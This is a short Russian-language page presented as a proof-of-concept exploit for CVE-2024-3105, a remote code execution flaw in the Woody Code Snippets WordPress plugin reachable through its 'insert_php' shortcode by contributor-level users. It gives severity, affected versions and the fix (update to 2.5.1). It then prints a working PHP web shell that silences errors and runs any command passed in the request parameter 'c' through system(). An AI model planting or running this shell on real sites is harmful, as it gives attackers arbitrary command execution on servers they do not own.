
PoC-эксплойт для CVE-2024-3105 - Woody code snippets – Insert Header Footer Code, AdSense Ads плагин для WordPress: удаленное выполнение кода (RCE)
Плагин Woody Code Snippets – Insert Header Footer Code, AdSense Ads для WordPress уязвим к удаленному выполнению кода во всех версиях до 2.5.0 включительно через шорткод 'insert_php'. Это связано с тем, что плагин не ограничивает использование этой функциональности только для авторизованных пользователей с высоким уровнем доступа. Это позволяет аутентифицированным злоумышленникам с уровнем доступа "contributor" и выше выполнять код на сервере.
Базовая оценка: 9.9 КРИТИЧЕСКИЙ
Вектор: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Тип ПО: Плагин
Слаг ПО: insert-php
Устранение: Обновитесь до версии 2.5.1 или более новой исправленной версии
Затронутая версия: <= 2.5.0
<?php
error_reporting(0);
$cmd = "$_REQUEST[c]";
if ($cmd == "") {
$cmd = "echo > NUL";
}
@system("$cmd");
?>